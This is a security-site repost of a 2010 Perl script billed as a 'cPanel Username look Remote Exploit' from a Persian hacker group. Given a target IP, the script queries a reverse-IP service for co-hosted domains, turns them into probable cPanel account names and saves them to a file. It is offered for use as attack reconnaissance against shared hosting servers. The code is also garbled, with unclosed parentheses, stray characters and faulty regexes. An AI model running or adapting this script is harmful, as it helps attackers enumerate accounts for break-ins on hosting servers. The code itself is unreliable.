首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
cPanel Username look Remote Exploit
来源:Net.Edit0r@Att.Net 作者:PHC.IR 发布时间:2010-06-21  
===================================
cPanel Username look Remote Exploit
===================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#######################[In The Name Of God ]##########################
#Exploit Title ? ? ? ?: ?cPanel Username look Remote Exploit
#Author ? ? ? ? ? ? ? : ? PHC.IR
#Contact ? ? ? ? ? ? ?: ?Net.Edit0r@Att.Net ?
#Location ? ? ? ? ? ? : ?Iran
#Code ? ? ? ? ? ? ? ? : ?[exploit code]
########################################################################


#!/usr/bin/perl
#############################################
# Phc-Persian Hackerz Community-Security Team 
###########################################
use LWP::Simple;
print "
****************************************************
cPanel Username look up Keep priv8 ? *
****************************************************
* Phc-Persian Hackerz Community-Security Team    *
* -------------------------------------------      *
* by PHC.IR ? ?>>>>>>>>>>> (Net.Edit0r )        *
* -----------------------------------------------  *
* Greetz to : admin ~ M.Prince ~ N20 ~ inj3ct0r   *
****************************************************";
print "\n\nTarget to look up -> ";
chomp ($ip = <> ;
print "Output -> ";
chomp ($out = <> ;
print "\n[~] Save & Data ....\n";
sleep(1);
$URL = "http://www.dedicatedornot.com/xml/".$ip;
$content = get($URL);
@name = split(/<sites>/,$content);
$name = @name[1];
@name = split(/<\/sites>/,$name);
$name = @name[0];
$name =~ s/<site>//g;
$name =~ s/<\/site>//g;
$name =~ s/www^.//g;
$name =~ s/^.com//g;
$name =~ s/^\s+//g;
open(IP,">site.txt" ;
print IP "$name";
close(IP);
sleep(1);

print "[~] Parsing Data ...\n";
chomp ($data_file = "site.txt" ;
sleep(1);
open(DAT, $data_file) || die("Could not open file!" ;
@raw_data=<DAT>;?

foreach $res (@raw_data)
{
chomp($res);
$line=$res;
my $new_line = ?substr( $line, 0,10);
#my $new_line=$line;
$new_line =~ s/\.//g;
$new_line =~ s/^\s+//g;
?
open(DA, ">>$out" || print "Can't Open File. Try chmod 777 directory<br><br>";
print DA "$new_line\n";
close(DA);
} open(add,">>$out" ;print add "Tnx to Net.Edit0r";close(add);
print "[~] Done .\n"
########################################################################
#Greetz       : admin ~ M.Prince ~ N20 ~ inj3ct0r ~ AGT ~ H4M3D ~ reglight
#Note : IRANIAN ?HackerZ
########################################################################
#www.phc.ir (Phc-Persian Hackerz Community-Security Team)
###########################[Net.Edit0r]#################################



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MoreAmp (.maf) local Stack Buf
·Sysax Multi Server (SFTP modul
·Safari 5.0 Denial of Service E
·Teamspeak <= 3.0.0-beta25 Mult
·Linux/x86-64 - Add root user w
·PHPWCMS 1.4.5 r389 Cross Site
·MoreAmp (.maf) local Stack Buf
·Subtitle Translation Wizard v3
·Orbital Viewer v1.04 (.ov) Loc
·linux/x86-64 - DNS spoofing C
·Hacker Evolution Game: untold
·Norex v1.3.2.0 Argument Heap-O
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved